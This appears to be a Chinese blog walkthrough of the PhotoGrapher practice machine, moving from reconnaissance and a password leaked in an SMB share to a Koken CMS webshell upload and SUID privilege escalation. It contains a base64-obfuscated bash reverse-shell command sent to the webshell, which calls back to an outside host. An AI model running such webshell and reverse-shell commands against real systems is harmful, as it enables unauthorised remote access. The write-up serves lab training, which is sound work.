靶機練習:PhotoGrapher

cha0s32發表於2024-04-12

掃埠

image-20240409102845136

image-20240409103057157

埠漏洞

80 埠 資訊收集:

兩個賬號資訊

v1n1v131r4

templated

dirsearch 進行目錄掃描

/assets

/*main.js*/
/*
	Hielo by TEMPLATED
	templated.co @templatedco
	Released for free under the Creative Commons Attribution 3.0 license (templated.co/license)
*/

新增域名解析

172.16.33.88 templated.co

8000 埠 資訊收集:

image-20240409105029445

image-20240409110419548

koken 搭建的站點,版本號0.22.24

image-20240409111656322

/admin 登入口,需要郵箱和密碼登入

image-20240409151901905

smb服務資訊收集

image-20240409151941506

image-20240409152029667

獲取共享檔案

image-20240409152428723

獲取共享資料夾

Message-ID: <4129F3CA.2020509@dc.edu>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <agi@photographer.com>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <daisa@photographer.com>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

賬號:daisa@photographer.com

密碼:babygirl

成功登入8000埠服務

獲取許可權

koken搭建的站點

image-20240409153653158

檢視是否存在漏洞

image-20240409153728705

該txt闡述瞭如何利用koken上傳木馬

image-20240409153845729

image-20240409170544595

image-20240409170614558

訪問

172.16.33.88:8000/storage/originals/48/02/test.php?cmd=echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjguMC4xNjUvNTU1NSAwPiYx|%20base64%20-d|/bin/bash%20-i

# base64 加密
# 加密內容為經典反彈shell

拿shell

image-20240409171150456

提權

上述有suid許可權的可執行檔案

image-20240409171626725

成功提權

image-20240409171917952

相關文章